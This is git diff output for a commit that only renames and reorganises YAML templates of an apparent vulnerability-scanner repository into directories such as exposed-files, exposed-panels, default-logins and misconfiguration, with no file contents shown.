.../jenkins-stack-trace.yaml | 0 .../jira-service-desk-signup.yaml | 0 .../jira-unauthenticated-dashboards.yaml | 0 .../jira-unauthenticated-popular-filters.yaml | 0 .../jira-unauthenticated-projects.yaml | 0 .../jira-unauthenticated-user-picker.yaml | 0 .../jupyter-ipython-unauth.yaml | 0 {security-misconfiguration => misconfiguration}/larvel-debug.yaml | 0 .../manage-engine-ad-search.yaml | 0 .../put-method-enabled.yaml | 0 .../rack-mini-profiler.yaml | 0 .../salesforce-aura-misconfig.yaml | 0 .../sidekiq-dashboard.yaml | 0 .../springboot-detect.yaml | 0 
.../unauthenticated-airflow.yaml | 0 .../unauthenticated-jenkin-dashboard.yaml | 0 .../unauthenticated-nacos-access.yaml | 0 .../wamp-xdebug-detect.yaml | 0 .../wordpress-accessible-wpconfig.yaml | 0 .../zenphoto-installation-sensitive-info.yaml | 0 {subdomain-takeover => takeovers}/detect-all-takeovers.yaml | 0 {subdomain-takeover => takeovers}/s3-subtakeover.yaml | 0 163 files changed, 0 insertions(+), 0 deletions(-) rename {default-credentials => default-logins}/grafana-default-credential.yaml (100%) rename {default-credentials => default-logins}/rabbitmq-default-admin.yaml (100%) rename {default-credentials => default-logins}/solarwinds-default-admin.yaml (100%) rename {default-credentials => default-logins}/tomcat-manager-default.yaml (100%) rename {files => exposed-files}/apc-info.yaml (100%) rename {files => exposed-files}/cgi-test-page.yaml (100%) rename {files => exposed-files}/composer-config.yaml (100%) rename {files => exposed-files}/docker-registry.yaml (100%) rename {files => exposed-files}/domcfg-page.yaml (100%) rename {files => exposed-files}/druid-monitor.yaml (100%) rename {files => exposed-files}/drupal-install.yaml (100%) rename {files => exposed-files}/ds_store.yaml (100%) rename {files => exposed-files}/elasticsearch.yaml (100%) rename {files => exposed-files}/elmah-log-file.yaml (100%) rename {files => exposed-files}/error-logs.yaml (100%) rename {files => exposed-files}/exposed-kibana.yaml (100%) rename {files => exposed-files}/exposed-svn.yaml (100%) rename {files => exposed-files}/filezilla.yaml (100%) rename {files => exposed-files}/firebase-detect.yaml (100%) rename {files => exposed-files}/git-config.yaml (100%) rename {files => exposed-files}/graylog-api-browser.yaml (100%) rename {files => exposed-files}/htpasswd-detection.yaml (100%) rename {files => exposed-files}/jkstatus-manager.yaml (100%) rename {files => exposed-files}/jolokia.yaml (100%) rename {files => exposed-files}/laravel-env.yaml (100%) rename {files => 
exposed-files}/lazy-file.yaml (100%) rename {files => exposed-files}/magento-config.yaml (100%) rename {files => exposed-files}/owncloud-config.yaml (100%) rename {files => exposed-files}/package-json.yaml (100%) rename {files => exposed-files}/php-errors.yaml (100%) rename {files => exposed-files}/phpinfo.yaml (100%) rename {files => exposed-files}/public-tomcat-instance.yaml (100%) rename {files => exposed-files}/redmine-db-config.yaml (100%) rename {files => exposed-files}/server-private-keys.yaml (100%) rename {files => exposed-files}/server-status-localhost.yaml (100%) rename {files => exposed-files}/shell-history.yaml (100%) rename {files => exposed-files}/sql-dump.yaml (100%) rename {files => exposed-files}/syfmony-profiler.yaml (100%) rename {files => exposed-files}/telerik-dialoghandler-detect.yaml (100%) rename {files => exposed-files}/telerik-fileupload-detect.yaml (100%) rename {files => exposed-files}/tomcat-scripts.yaml (100%) rename {files => exposed-files}/trace-axd-detect.yaml (100%) rename {files => exposed-files}/wadl-files.yaml (100%) rename {files => exposed-files}/web-config.yaml (100%) rename {files => exposed-files}/wordpress-db-backup.yaml (100%) rename {files => exposed-files}/wordpress-debug-log.yaml (100%) rename {files => exposed-files}/wordpress-directory-listing.yaml (100%) rename {files => exposed-files}/wordpress-emergency-script.yaml (100%) rename {files => exposed-files}/wordpress-installer-log.yaml (100%) rename {files => exposed-files}/wordpress-tmm-db-migrate.yaml (100%) rename {files => exposed-files}/wordpress-user-enumeration.yaml (100%) rename {files => exposed-files}/wsdl-detect.yaml (100%) rename {files => exposed-files}/xprober-service.yaml (100%) rename {files => exposed-files}/zip-backup-files.yaml (100%) rename {panels => exposed-panels}/adminer-panel.yaml (100%) rename {panels => exposed-panels}/aims-password-mgmt-client.yaml (100%) rename {panels => exposed-panels}/atlassian-crowd-panel.yaml (100%) rename {panels => 
exposed-panels}/cisco-asa-panel.yaml (100%) rename {panels => exposed-panels}/citrix-adc-gateway-detect.yaml (100%) rename {panels => exposed-panels}/citrix-vpn-detect.yaml (100%) rename {panels => exposed-panels}/compal.yaml (100%) rename {panels => exposed-panels}/crxde.yaml (100%) rename {panels => exposed-panels}/docker-api.yaml (100%) rename {panels => exposed-panels}/fortinet-fortigate-panel.yaml (100%) rename {panels => exposed-panels}/fortiweb-panel.yaml (100%) rename {panels => exposed-panels}/github-enterprise-detect.yaml (100%) rename {panels => exposed-panels}/gitlab-detect.yaml (100%) rename {panels => exposed-panels}/globalprotect-panel.yaml (100%) rename {panels => exposed-panels}/go-anywhere-client.yaml (100%) rename {panels => exposed-panels}/grafana-detect.yaml (100%) rename {panels => exposed-panels}/identityguard-selfservice-entrust.yaml (100%) rename {panels => exposed-panels}/iomega-lenovo-emc-shared-nas-detect.yaml (100%) rename {panels => exposed-panels}/jenkins-asyncpeople.yaml (100%) rename {panels => exposed-panels}/jmx-console.yaml (100%) rename {panels => exposed-panels}/kubernetes-pods.yaml (100%) rename {panels => exposed-panels}/manage-engine-admanager-panel.yaml (100%) rename {panels => exposed-panels}/mobileiron-login.yaml (100%) rename {panels => exposed-panels}/netscaler-gateway.yaml (100%) rename {panels => exposed-panels}/network-camera-detect.yaml (100%) rename {panels => exposed-panels}/oipm-detect.yaml (100%) rename {panels => exposed-panels}/parallels-html-client.yaml (100%) rename {panels => exposed-panels}/phpmyadmin-panel.yaml (100%) rename {panels => exposed-panels}/polycom-admin-detect.yaml (100%) rename {panels => exposed-panels}/pulse-secure-panel.yaml (100%) rename {panels => exposed-panels}/rabbitmq-dashboard.yaml (100%) rename {panels => exposed-panels}/rsa-self-service.yaml (100%) rename {panels => exposed-panels}/sap-hana-xsengine-panel.yaml (100%) rename {panels => exposed-panels}/sap-netweaver-detect.yaml 
(100%)
 rename {panels => exposed-panels}/sap-recon-detect.yaml (100%)
 rename {panels => exposed-panels}/solarwinds-orion.yaml (100%)
 rename {panels => exposed-panels}/sonarqube-login.yaml (100%)
 rename {panels => exposed-panels}/sonicwall-management-panel.yaml (100%)
 rename {panels => exposed-panels}/sonicwall-sslvpn-panel.yaml (100%)
 rename {panels => exposed-panels}/sophos-fw-version-detect.yaml (100%)
 rename {panels => exposed-panels}/supervpn-panel.yaml (100%)
 rename {panels => exposed-panels}/swagger-panel.yaml (100%)
 rename {panels => exposed-panels}/tikiwiki-cms.yaml (100%)
 rename {panels => exposed-panels}/traefik-dashboard.yaml (100%)
 rename {panels => exposed-panels}/virtual-ema-detect.yaml (100%)
 rename {panels => exposed-panels}/weave-scope-dashboard-detect.yaml (100%)
 rename {panels => exposed-panels}/webeditors.yaml (100%)
 rename {panels => exposed-panels}/webmin-panel.yaml (100%)
 rename {panels => exposed-panels}/workspace-one-uem.yaml (100%)
 rename {panels => exposed-panels}/workspaceone-uem-airwatch-dashboard-detect.yaml (100%)
 rename {tokens => exposed-tokens/tokens}/amazon-mws-auth-token-value.yaml (100%)
 rename {tokens => exposed-tokens/tokens}/aws-access-key-value.yaml (100%)
 rename {tokens => exposed-tokens/tokens}/credentials-disclosure.yaml (100%)
 rename {tokens => exposed-tokens/tokens}/fcm-server-key.yaml (100%)
 rename {tokens => exposed-tokens/tokens}/google-api-key.yaml (100%)
 rename {tokens => exposed-tokens/tokens}/http-username-password.yaml (100%)
 rename {tokens => exposed-tokens/tokens}/mailchimp-api-key.yaml (100%)
 rename {tokens => exposed-tokens/tokens}/slack-access-token.yaml (100%)
 rename {payloads => helpers/payloads}/CVE-2020-5776.csv (100%)
 rename {payloads => helpers/payloads}/CVE-2020-6287.xml (100%)
 rename {wordlists => helpers/wordlists}/wp-plugins.txt (100%)
 rename {misc => miscellaneous}/basic-cors-flash.yaml (100%)
 rename {misc => miscellaneous}/dir-listing.yaml (100%)
 rename {misc => 
miscellaneous}/htaccess-config.yaml (100%)
 rename {misc => miscellaneous}/missing-csp.yaml (100%)
 rename {misc => miscellaneous}/missing-hsts.yaml (100%)
 rename {misc => miscellaneous}/missing-x-frame-options.yaml (100%)
 rename {misc => miscellaneous}/ntlm-directories.yaml (100%)
 rename {misc => miscellaneous}/old-copyright.yaml (100%)
 rename {misc => miscellaneous}/robots.txt.yaml (100%)
 rename {misc => miscellaneous}/security.txt.yaml (100%)
 rename {misc => miscellaneous}/trace-method.yaml (100%)
 rename {misc => miscellaneous}/unencrypted-bigip-ltm-cookie.yaml (100%)
 rename {misc => miscellaneous}/wp-xmlrpc.yaml (100%)
 rename {misc => miscellaneous}/xml-schema-detect.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/aem-groovyconsole.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/apache-tomcat-snoop.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/aspx-debug-mode.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/basic-cors.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/django-debug-detect.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/drupal-user-enum-ajax.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/drupal-user-enum-redirect.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/exposed-service-now.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/front-page-misconfig.yaml (100%)
 rename {generic-detections => misconfiguration/generic-detections}/basic-xss-prober.yaml (100%)
 rename {generic-detections => misconfiguration/generic-detections}/general-tokens.yaml (100%)
 rename {generic-detections => misconfiguration/generic-detections}/top-15-xss.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/jenkins-stack-trace.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/jira-service-desk-signup.yaml (100%)
 rename {security-misconfiguration => 
misconfiguration}/jira-unauthenticated-dashboards.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/jira-unauthenticated-popular-filters.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/jira-unauthenticated-projects.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/jira-unauthenticated-user-picker.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/jupyter-ipython-unauth.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/larvel-debug.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/manage-engine-ad-search.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/put-method-enabled.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/rack-mini-profiler.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/salesforce-aura-misconfig.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/sidekiq-dashboard.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/springboot-detect.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/unauthenticated-airflow.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/unauthenticated-jenkin-dashboard.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/unauthenticated-nacos-access.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/wamp-xdebug-detect.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/wordpress-accessible-wpconfig.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/zenphoto-installation-sensitive-info.yaml (100%)
 rename {subdomain-takeover => takeovers}/detect-all-takeovers.yaml (100%)
 rename {subdomain-takeover => takeovers}/s3-subtakeover.yaml (100%)
diff --git a/default-credentials/grafana-default-credential.yaml b/default-logins/grafana-default-credential.yaml
similarity index 100%
rename from default-credentials/grafana-default-credential.yaml
rename to default-logins/grafana-default-credential.yaml
diff --git a/default-credentials/rabbitmq-default-admin.yaml b/default-logins/rabbitmq-default-admin.yaml
similarity index 100%
rename from default-credentials/rabbitmq-default-admin.yaml
rename to default-logins/rabbitmq-default-admin.yaml
diff --git a/default-credentials/solarwinds-default-admin.yaml b/default-logins/solarwinds-default-admin.yaml
similarity index 100%
rename from default-credentials/solarwinds-default-admin.yaml
rename to default-logins/solarwinds-default-admin.yaml
diff --git a/default-credentials/tomcat-manager-default.yaml b/default-logins/tomcat-manager-default.yaml
similarity index 100%
rename from default-credentials/tomcat-manager-default.yaml
rename to default-logins/tomcat-manager-default.yaml
diff --git a/files/apc-info.yaml b/exposed-files/apc-info.yaml
similarity index 100%
rename from files/apc-info.yaml
rename to exposed-files/apc-info.yaml
diff --git a/files/cgi-test-page.yaml b/exposed-files/cgi-test-page.yaml
similarity index 100%
rename from files/cgi-test-page.yaml
rename to exposed-files/cgi-test-page.yaml
diff --git a/files/composer-config.yaml b/exposed-files/composer-config.yaml
similarity index 100%
rename from files/composer-config.yaml
rename to exposed-files/composer-config.yaml
diff --git a/files/docker-registry.yaml b/exposed-files/docker-registry.yaml
similarity index 100%
rename from files/docker-registry.yaml
rename to exposed-files/docker-registry.yaml
diff --git a/files/domcfg-page.yaml b/exposed-files/domcfg-page.yaml
similarity index 100%
rename from files/domcfg-page.yaml
rename to exposed-files/domcfg-page.yaml
diff --git a/files/druid-monitor.yaml b/exposed-files/druid-monitor.yaml
similarity index 100%
rename from files/druid-monitor.yaml
rename to exposed-files/druid-monitor.yaml
diff --git a/files/drupal-install.yaml b/exposed-files/drupal-install.yaml
similarity index 100%
rename from files/drupal-install.yaml
rename to exposed-files/drupal-install.yaml
diff --git a/files/ds_store.yaml b/exposed-files/ds_store.yaml
similarity index 100%
rename from files/ds_store.yaml
rename to exposed-files/ds_store.yaml
diff --git a/files/elasticsearch.yaml b/exposed-files/elasticsearch.yaml
similarity index 100%
rename from files/elasticsearch.yaml
rename to exposed-files/elasticsearch.yaml
diff --git a/files/elmah-log-file.yaml b/exposed-files/elmah-log-file.yaml
similarity index 100%
rename from files/elmah-log-file.yaml
rename to exposed-files/elmah-log-file.yaml
diff --git a/files/error-logs.yaml b/exposed-files/error-logs.yaml
similarity index 100%
rename from files/error-logs.yaml
rename to exposed-files/error-logs.yaml
diff --git a/files/exposed-kibana.yaml b/exposed-files/exposed-kibana.yaml
similarity index 100%
rename from files/exposed-kibana.yaml
rename to exposed-files/exposed-kibana.yaml
diff --git a/files/exposed-svn.yaml b/exposed-files/exposed-svn.yaml
similarity index 100%
rename from files/exposed-svn.yaml
rename to exposed-files/exposed-svn.yaml
diff --git a/files/filezilla.yaml b/exposed-files/filezilla.yaml
similarity index 100%
rename from files/filezilla.yaml
rename to exposed-files/filezilla.yaml
diff --git a/files/firebase-detect.yaml b/exposed-files/firebase-detect.yaml
similarity index 100%
rename from files/firebase-detect.yaml
rename to exposed-files/firebase-detect.yaml
diff --git a/files/git-config.yaml b/exposed-files/git-config.yaml
similarity index 100%
rename from files/git-config.yaml
rename to exposed-files/git-config.yaml
diff --git a/files/graylog-api-browser.yaml b/exposed-files/graylog-api-browser.yaml
similarity index 100%
rename from files/graylog-api-browser.yaml
rename to exposed-files/graylog-api-browser.yaml
diff --git a/files/htpasswd-detection.yaml b/exposed-files/htpasswd-detection.yaml
similarity index 100%
rename from files/htpasswd-detection.yaml
rename to exposed-files/htpasswd-detection.yaml
diff --git a/files/jkstatus-manager.yaml b/exposed-files/jkstatus-manager.yaml
similarity index 100%
rename from files/jkstatus-manager.yaml
rename to exposed-files/jkstatus-manager.yaml
diff --git a/files/jolokia.yaml b/exposed-files/jolokia.yaml
similarity index 100%
rename from files/jolokia.yaml
rename to exposed-files/jolokia.yaml
diff --git a/files/laravel-env.yaml b/exposed-files/laravel-env.yaml
similarity index 100%
rename from files/laravel-env.yaml
rename to exposed-files/laravel-env.yaml
diff --git a/files/lazy-file.yaml b/exposed-files/lazy-file.yaml
similarity index 100%
rename from files/lazy-file.yaml
rename to exposed-files/lazy-file.yaml
diff --git a/files/magento-config.yaml b/exposed-files/magento-config.yaml
similarity index 100%
rename from files/magento-config.yaml
rename to exposed-files/magento-config.yaml
diff --git a/files/owncloud-config.yaml b/exposed-files/owncloud-config.yaml
similarity index 100%
rename from files/owncloud-config.yaml
rename to exposed-files/owncloud-config.yaml
diff --git a/files/package-json.yaml b/exposed-files/package-json.yaml
similarity index 100%
rename from files/package-json.yaml
rename to exposed-files/package-json.yaml
diff --git a/files/php-errors.yaml b/exposed-files/php-errors.yaml
similarity index 100%
rename from files/php-errors.yaml
rename to exposed-files/php-errors.yaml
diff --git a/files/phpinfo.yaml b/exposed-files/phpinfo.yaml
similarity index 100%
rename from files/phpinfo.yaml
rename to exposed-files/phpinfo.yaml
diff --git a/files/public-tomcat-instance.yaml b/exposed-files/public-tomcat-instance.yaml
similarity index 100%
rename from files/public-tomcat-instance.yaml
rename to exposed-files/public-tomcat-instance.yaml
diff --git a/files/redmine-db-config.yaml b/exposed-files/redmine-db-config.yaml
similarity index 100%
rename from files/redmine-db-config.yaml
rename to exposed-files/redmine-db-config.yaml
diff --git a/files/server-private-keys.yaml b/exposed-files/server-private-keys.yaml
similarity index 100%
rename from files/server-private-keys.yaml
rename to exposed-files/server-private-keys.yaml
diff --git a/files/server-status-localhost.yaml b/exposed-files/server-status-localhost.yaml
similarity index 100%
rename from files/server-status-localhost.yaml
rename to exposed-files/server-status-localhost.yaml
diff --git a/files/shell-history.yaml b/exposed-files/shell-history.yaml
similarity index 100%
rename from files/shell-history.yaml
rename to exposed-files/shell-history.yaml
diff --git a/files/sql-dump.yaml b/exposed-files/sql-dump.yaml
similarity index 100%
rename from files/sql-dump.yaml
rename to exposed-files/sql-dump.yaml
diff --git a/files/syfmony-profiler.yaml b/exposed-files/syfmony-profiler.yaml
similarity index 100%
rename from files/syfmony-profiler.yaml
rename to exposed-files/syfmony-profiler.yaml
diff --git a/files/telerik-dialoghandler-detect.yaml b/exposed-files/telerik-dialoghandler-detect.yaml
similarity index 100%
rename from files/telerik-dialoghandler-detect.yaml
rename to exposed-files/telerik-dialoghandler-detect.yaml
diff --git a/files/telerik-fileupload-detect.yaml b/exposed-files/telerik-fileupload-detect.yaml
similarity index 100%
rename from files/telerik-fileupload-detect.yaml
rename to exposed-files/telerik-fileupload-detect.yaml
diff --git a/files/tomcat-scripts.yaml b/exposed-files/tomcat-scripts.yaml
similarity index 100%
rename from files/tomcat-scripts.yaml
rename to exposed-files/tomcat-scripts.yaml
diff --git a/files/trace-axd-detect.yaml b/exposed-files/trace-axd-detect.yaml
similarity index 100%
rename from files/trace-axd-detect.yaml
rename to exposed-files/trace-axd-detect.yaml
diff --git a/files/wadl-files.yaml b/exposed-files/wadl-files.yaml
similarity index 100%
rename from files/wadl-files.yaml
rename to exposed-files/wadl-files.yaml
diff --git a/files/web-config.yaml b/exposed-files/web-config.yaml
similarity index 100%
rename from files/web-config.yaml
rename to exposed-files/web-config.yaml
diff --git a/files/wordpress-db-backup.yaml b/exposed-files/wordpress-db-backup.yaml
similarity index 100%
rename from files/wordpress-db-backup.yaml
rename to exposed-files/wordpress-db-backup.yaml
diff --git a/files/wordpress-debug-log.yaml b/exposed-files/wordpress-debug-log.yaml
similarity index 100%
rename from files/wordpress-debug-log.yaml
rename to exposed-files/wordpress-debug-log.yaml
diff --git a/files/wordpress-directory-listing.yaml b/exposed-files/wordpress-directory-listing.yaml
similarity index 100%
rename from files/wordpress-directory-listing.yaml
rename to exposed-files/wordpress-directory-listing.yaml
diff --git a/files/wordpress-emergency-script.yaml b/exposed-files/wordpress-emergency-script.yaml
similarity index 100%
rename from files/wordpress-emergency-script.yaml
rename to exposed-files/wordpress-emergency-script.yaml
diff --git a/files/wordpress-installer-log.yaml b/exposed-files/wordpress-installer-log.yaml
similarity index 100%
rename from files/wordpress-installer-log.yaml
rename to exposed-files/wordpress-installer-log.yaml
diff --git a/files/wordpress-tmm-db-migrate.yaml b/exposed-files/wordpress-tmm-db-migrate.yaml
similarity index 100%
rename from files/wordpress-tmm-db-migrate.yaml
rename to exposed-files/wordpress-tmm-db-migrate.yaml
diff --git a/files/wordpress-user-enumeration.yaml b/exposed-files/wordpress-user-enumeration.yaml
similarity index 100%
rename from files/wordpress-user-enumeration.yaml
rename to exposed-files/wordpress-user-enumeration.yaml
diff --git a/files/wsdl-detect.yaml b/exposed-files/wsdl-detect.yaml
similarity index 100%
rename from files/wsdl-detect.yaml
rename to exposed-files/wsdl-detect.yaml
diff --git a/files/xprober-service.yaml b/exposed-files/xprober-service.yaml
similarity index 100%
rename from files/xprober-service.yaml
rename to exposed-files/xprober-service.yaml
diff --git a/files/zip-backup-files.yaml b/exposed-files/zip-backup-files.yaml
similarity index 100%
rename from files/zip-backup-files.yaml
rename to exposed-files/zip-backup-files.yaml
diff --git a/panels/adminer-panel.yaml b/exposed-panels/adminer-panel.yaml
similarity index 100%
rename from panels/adminer-panel.yaml
rename to exposed-panels/adminer-panel.yaml
diff --git a/panels/aims-password-mgmt-client.yaml b/exposed-panels/aims-password-mgmt-client.yaml
similarity index 100%
rename from panels/aims-password-mgmt-client.yaml
rename to exposed-panels/aims-password-mgmt-client.yaml
diff --git a/panels/atlassian-crowd-panel.yaml b/exposed-panels/atlassian-crowd-panel.yaml
similarity index 100%
rename from panels/atlassian-crowd-panel.yaml
rename to exposed-panels/atlassian-crowd-panel.yaml
diff --git a/panels/cisco-asa-panel.yaml b/exposed-panels/cisco-asa-panel.yaml
similarity index 100%
rename from panels/cisco-asa-panel.yaml
rename to exposed-panels/cisco-asa-panel.yaml
diff --git a/panels/citrix-adc-gateway-detect.yaml b/exposed-panels/citrix-adc-gateway-detect.yaml
similarity index 100%
rename from panels/citrix-adc-gateway-detect.yaml
rename to exposed-panels/citrix-adc-gateway-detect.yaml
diff --git a/panels/citrix-vpn-detect.yaml b/exposed-panels/citrix-vpn-detect.yaml
similarity index 100%
rename from panels/citrix-vpn-detect.yaml
rename to exposed-panels/citrix-vpn-detect.yaml
diff --git a/panels/compal.yaml b/exposed-panels/compal.yaml
similarity index 100%
rename from panels/compal.yaml
rename to exposed-panels/compal.yaml
diff --git a/panels/crxde.yaml b/exposed-panels/crxde.yaml
similarity index 100%
rename from panels/crxde.yaml
rename to exposed-panels/crxde.yaml
diff --git a/panels/docker-api.yaml b/exposed-panels/docker-api.yaml
similarity index 100%
rename from panels/docker-api.yaml
rename to exposed-panels/docker-api.yaml
diff --git a/panels/fortinet-fortigate-panel.yaml b/exposed-panels/fortinet-fortigate-panel.yaml
similarity index 100%
rename from panels/fortinet-fortigate-panel.yaml
rename to exposed-panels/fortinet-fortigate-panel.yaml
diff --git a/panels/fortiweb-panel.yaml b/exposed-panels/fortiweb-panel.yaml
similarity index 100%
rename from panels/fortiweb-panel.yaml
rename to exposed-panels/fortiweb-panel.yaml
diff --git a/panels/github-enterprise-detect.yaml b/exposed-panels/github-enterprise-detect.yaml
similarity index 100%
rename from panels/github-enterprise-detect.yaml
rename to exposed-panels/github-enterprise-detect.yaml
diff --git a/panels/gitlab-detect.yaml b/exposed-panels/gitlab-detect.yaml
similarity index 100%
rename from panels/gitlab-detect.yaml
rename to exposed-panels/gitlab-detect.yaml
diff --git a/panels/globalprotect-panel.yaml b/exposed-panels/globalprotect-panel.yaml
similarity index 100%
rename from panels/globalprotect-panel.yaml
rename to exposed-panels/globalprotect-panel.yaml
diff --git a/panels/go-anywhere-client.yaml b/exposed-panels/go-anywhere-client.yaml
similarity index 100%
rename from panels/go-anywhere-client.yaml
rename to exposed-panels/go-anywhere-client.yaml
diff --git a/panels/grafana-detect.yaml b/exposed-panels/grafana-detect.yaml
similarity index 100%
rename from panels/grafana-detect.yaml
rename to exposed-panels/grafana-detect.yaml
diff --git a/panels/identityguard-selfservice-entrust.yaml b/exposed-panels/identityguard-selfservice-entrust.yaml
similarity index 100%
rename from panels/identityguard-selfservice-entrust.yaml
rename to exposed-panels/identityguard-selfservice-entrust.yaml
diff --git a/panels/iomega-lenovo-emc-shared-nas-detect.yaml b/exposed-panels/iomega-lenovo-emc-shared-nas-detect.yaml
similarity index 100%
rename from panels/iomega-lenovo-emc-shared-nas-detect.yaml
rename to exposed-panels/iomega-lenovo-emc-shared-nas-detect.yaml
diff --git a/panels/jenkins-asyncpeople.yaml b/exposed-panels/jenkins-asyncpeople.yaml
similarity index 100%
rename from panels/jenkins-asyncpeople.yaml
rename to exposed-panels/jenkins-asyncpeople.yaml
diff --git a/panels/jmx-console.yaml b/exposed-panels/jmx-console.yaml
similarity index 100%
rename from panels/jmx-console.yaml
rename to exposed-panels/jmx-console.yaml
diff --git a/panels/kubernetes-pods.yaml b/exposed-panels/kubernetes-pods.yaml
similarity index 100%
rename from panels/kubernetes-pods.yaml
rename to exposed-panels/kubernetes-pods.yaml
diff --git a/panels/manage-engine-admanager-panel.yaml b/exposed-panels/manage-engine-admanager-panel.yaml
similarity index 100%
rename from panels/manage-engine-admanager-panel.yaml
rename to exposed-panels/manage-engine-admanager-panel.yaml
diff --git a/panels/mobileiron-login.yaml b/exposed-panels/mobileiron-login.yaml
similarity index 100%
rename from panels/mobileiron-login.yaml
rename to exposed-panels/mobileiron-login.yaml
diff --git a/panels/netscaler-gateway.yaml b/exposed-panels/netscaler-gateway.yaml
similarity index 100%
rename from panels/netscaler-gateway.yaml
rename to exposed-panels/netscaler-gateway.yaml
diff --git a/panels/network-camera-detect.yaml b/exposed-panels/network-camera-detect.yaml
similarity index 100%
rename from panels/network-camera-detect.yaml
rename to exposed-panels/network-camera-detect.yaml
diff --git a/panels/oipm-detect.yaml b/exposed-panels/oipm-detect.yaml
similarity index 100%
rename from panels/oipm-detect.yaml
rename to exposed-panels/oipm-detect.yaml
diff --git a/panels/parallels-html-client.yaml b/exposed-panels/parallels-html-client.yaml
similarity index 100%
rename from panels/parallels-html-client.yaml
rename to exposed-panels/parallels-html-client.yaml
diff --git a/panels/phpmyadmin-panel.yaml b/exposed-panels/phpmyadmin-panel.yaml
similarity index 100%
rename from panels/phpmyadmin-panel.yaml
rename to exposed-panels/phpmyadmin-panel.yaml
diff --git a/panels/polycom-admin-detect.yaml b/exposed-panels/polycom-admin-detect.yaml
similarity index 100%
rename from panels/polycom-admin-detect.yaml
rename to exposed-panels/polycom-admin-detect.yaml
diff --git a/panels/pulse-secure-panel.yaml b/exposed-panels/pulse-secure-panel.yaml
similarity index 100%
rename from panels/pulse-secure-panel.yaml
rename to exposed-panels/pulse-secure-panel.yaml
diff --git a/panels/rabbitmq-dashboard.yaml b/exposed-panels/rabbitmq-dashboard.yaml
similarity index 100%
rename from panels/rabbitmq-dashboard.yaml
rename to exposed-panels/rabbitmq-dashboard.yaml
diff --git a/panels/rsa-self-service.yaml b/exposed-panels/rsa-self-service.yaml
similarity index 100%
rename from panels/rsa-self-service.yaml
rename to exposed-panels/rsa-self-service.yaml
diff --git a/panels/sap-hana-xsengine-panel.yaml b/exposed-panels/sap-hana-xsengine-panel.yaml
similarity index 100%
rename from panels/sap-hana-xsengine-panel.yaml
rename to exposed-panels/sap-hana-xsengine-panel.yaml
diff --git a/panels/sap-netweaver-detect.yaml b/exposed-panels/sap-netweaver-detect.yaml
similarity index 100%
rename from panels/sap-netweaver-detect.yaml
rename to exposed-panels/sap-netweaver-detect.yaml
diff --git a/panels/sap-recon-detect.yaml b/exposed-panels/sap-recon-detect.yaml
similarity index 100%
rename from panels/sap-recon-detect.yaml
rename to exposed-panels/sap-recon-detect.yaml
diff --git a/panels/solarwinds-orion.yaml b/exposed-panels/solarwinds-orion.yaml
similarity index 100%
rename from panels/solarwinds-orion.yaml
rename to exposed-panels/solarwinds-orion.yaml
diff --git a/panels/sonarqube-login.yaml b/exposed-panels/sonarqube-login.yaml
similarity index 100%
rename from panels/sonarqube-login.yaml
rename to exposed-panels/sonarqube-login.yaml
diff --git a/panels/sonicwall-management-panel.yaml b/exposed-panels/sonicwall-management-panel.yaml
similarity index 100%
rename from panels/sonicwall-management-panel.yaml
rename to exposed-panels/sonicwall-management-panel.yaml
diff --git a/panels/sonicwall-sslvpn-panel.yaml b/exposed-panels/sonicwall-sslvpn-panel.yaml
similarity index 100%
rename from panels/sonicwall-sslvpn-panel.yaml
rename to exposed-panels/sonicwall-sslvpn-panel.yaml
diff --git a/panels/sophos-fw-version-detect.yaml b/exposed-panels/sophos-fw-version-detect.yaml
similarity index 100%
rename from panels/sophos-fw-version-detect.yaml
rename to exposed-panels/sophos-fw-version-detect.yaml
diff --git a/panels/supervpn-panel.yaml b/exposed-panels/supervpn-panel.yaml
similarity index 100%
rename from panels/supervpn-panel.yaml
rename to exposed-panels/supervpn-panel.yaml
diff --git a/panels/swagger-panel.yaml b/exposed-panels/swagger-panel.yaml
similarity index 100%
rename from panels/swagger-panel.yaml
rename to exposed-panels/swagger-panel.yaml
diff --git a/panels/tikiwiki-cms.yaml b/exposed-panels/tikiwiki-cms.yaml
similarity index 100%
rename from panels/tikiwiki-cms.yaml
rename to exposed-panels/tikiwiki-cms.yaml
diff --git a/panels/traefik-dashboard.yaml b/exposed-panels/traefik-dashboard.yaml
similarity index 100%
rename from panels/traefik-dashboard.yaml
rename to exposed-panels/traefik-dashboard.yaml
diff --git a/panels/virtual-ema-detect.yaml b/exposed-panels/virtual-ema-detect.yaml
similarity index 100%
rename from panels/virtual-ema-detect.yaml
rename to exposed-panels/virtual-ema-detect.yaml
diff --git a/panels/weave-scope-dashboard-detect.yaml b/exposed-panels/weave-scope-dashboard-detect.yaml
similarity index 100%
rename from panels/weave-scope-dashboard-detect.yaml
rename to exposed-panels/weave-scope-dashboard-detect.yaml
diff --git a/panels/webeditors.yaml b/exposed-panels/webeditors.yaml
similarity index 100%
rename from panels/webeditors.yaml
rename to exposed-panels/webeditors.yaml
diff --git a/panels/webmin-panel.yaml b/exposed-panels/webmin-panel.yaml
similarity index 100%
rename from panels/webmin-panel.yaml
rename to exposed-panels/webmin-panel.yaml
